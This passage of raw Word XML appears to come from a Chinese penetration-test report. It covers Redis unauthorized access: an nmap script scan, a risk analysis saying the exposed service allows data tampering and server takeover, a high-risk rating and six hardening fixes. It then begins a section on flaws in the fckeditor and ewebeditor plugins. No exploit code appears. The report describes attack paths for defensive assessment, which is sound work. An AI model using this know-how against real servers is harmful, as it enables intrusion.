          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端工具连接</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B973FDA" w14:textId="7B21483E" w:rsidR="00680E2B" w:rsidRPr="004342B6" w:rsidRDefault="00945908" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46DD6623" wp14:editId="36A4310B">
            <wp:extent cx="4775200" cy="604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5200" cy="6045200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D41BC" w14:textId="5A0962CC" w:rsidR="00905A13" w:rsidRPr="004342B6" w:rsidRDefault="00905A13" w:rsidP="004342B6">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3729CF7B" w14:textId="28E15FE6" w:rsidR="00905A13" w:rsidRPr="004342B6" w:rsidRDefault="00A24E38" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6928C6FB" wp14:editId="7CC7C11A">
            <wp:extent cx="5400040" cy="2908935"/>
            <wp:effectExtent l="0" t="0" r="10160" b="120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08935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A048BE" w14:textId="77777777" w:rsidR="002B6FF4" w:rsidRPr="004342B6" w:rsidRDefault="00C24790" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00680E2B" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="002B6FF4" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis </w:t>
      </w:r>
      <w:r w:rsidR="002B6FF4" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认情况下，会绑定在</w:t>
      </w:r>
      <w:r w:rsidR="002B6FF4" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.0.0.0:6379</w:t>
      </w:r>
      <w:r w:rsidR="002B6FF4" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，导致</w:t>
      </w:r>
      <w:r w:rsidR="002B6FF4" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidR="002B6FF4" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务暴露到公网上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A019EDA" w14:textId="67BEFD8F" w:rsidR="00680E2B" w:rsidRPr="004342B6" w:rsidRDefault="002B6FF4" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在没有开启认证并且在任意用户可以访问目标服务器的情况下，从而可以未授权访问</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务，进一步可进行数据增删改查，甚至获取服务器权限等恶意操作</w:t>
      </w:r>
      <w:r w:rsidR="00A110BD" w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38131F" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214264E7" w14:textId="055D2FDA" w:rsidR="00680E2B" w:rsidRPr="004342B6" w:rsidRDefault="001F18C9" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B25C731" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4694F5DA" w14:textId="77777777" w:rsidR="0069181F" w:rsidRPr="004342B6" w:rsidRDefault="0069181F" w:rsidP="004342B6">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务对公网开放，可通过修改</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>redis.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>配置文件中的</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>"#bind 127.0.0.1" </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，去掉前面的</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>"#"</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>即可（</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>本来就是作为内存数据库，只要监听在本机即可）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA88FA0" w14:textId="77777777" w:rsidR="0069181F" w:rsidRPr="004342B6" w:rsidRDefault="0069181F" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>2. </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>设置密码访问认证，可通过修改</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>redis.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>配置文件中的</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>"requirepass" </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>设置复杂密码</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>（需要重启</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务才能生效）；</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>3. </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>对访问源</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>进行访问控制，可在防火墙限定指定源</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>才可以连接</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务器；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9AC863" w14:textId="77777777" w:rsidR="0069181F" w:rsidRPr="004342B6" w:rsidRDefault="0069181F" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>4. </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>默认端口，将默认的</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>6379</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>端口修改为其他端口；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090660F3" w14:textId="77777777" w:rsidR="0069181F" w:rsidRPr="004342B6" w:rsidRDefault="0069181F" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>5. </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>指令避免恶意操作，在</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>redis.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>中配置</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>rename-command</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>项</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>"RENAME_CONFIG"</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，这样即使存在未授权访问，也能够给攻击者使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>config </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>指令加大难</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>度；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618BE46C" w14:textId="73B019DD" w:rsidR="00680E2B" w:rsidRDefault="0069181F" w:rsidP="004342B6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>6. Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>使用普通用户权限，禁止使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t> root </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>权限启动</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Redis </w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务，这样可以保证在存在漏洞的情况下攻击者也只能获取到普通用户权限，无法获取</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="004342B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>权限；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4877C8" w14:textId="63282A91" w:rsidR="005043FA" w:rsidRPr="004342B6" w:rsidRDefault="005043FA" w:rsidP="004342B6">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3974F060" w14:textId="34FFFA3B" w:rsidR="00680E2B" w:rsidRPr="00F757E4" w:rsidRDefault="00680E2B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc498434570"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方插件相关漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D56EC" w14:textId="10540185" w:rsidR="00680E2B" w:rsidRPr="00E04D10" w:rsidRDefault="00680E2B" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="007D2E68" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三方插件，如编辑器</w:t>
      </w:r>
      <w:r w:rsidR="007D2E68" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fckeditor</w:t>
      </w:r>
      <w:r w:rsidR="00CB5716" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00CB5716" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ewebeditor</w:t>
      </w:r>
      <w:r w:rsidR="007D2E68" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等存在的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C5AD3" w14:textId="7ED034C4" w:rsidR="00680E2B" w:rsidRPr="00E04D10" w:rsidRDefault="00680E2B" w:rsidP="00E04D10">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00C80FDC" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidR="00CB5716" w:rsidRPr="00E04D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ewebeditor</w:t>
      </w:r>
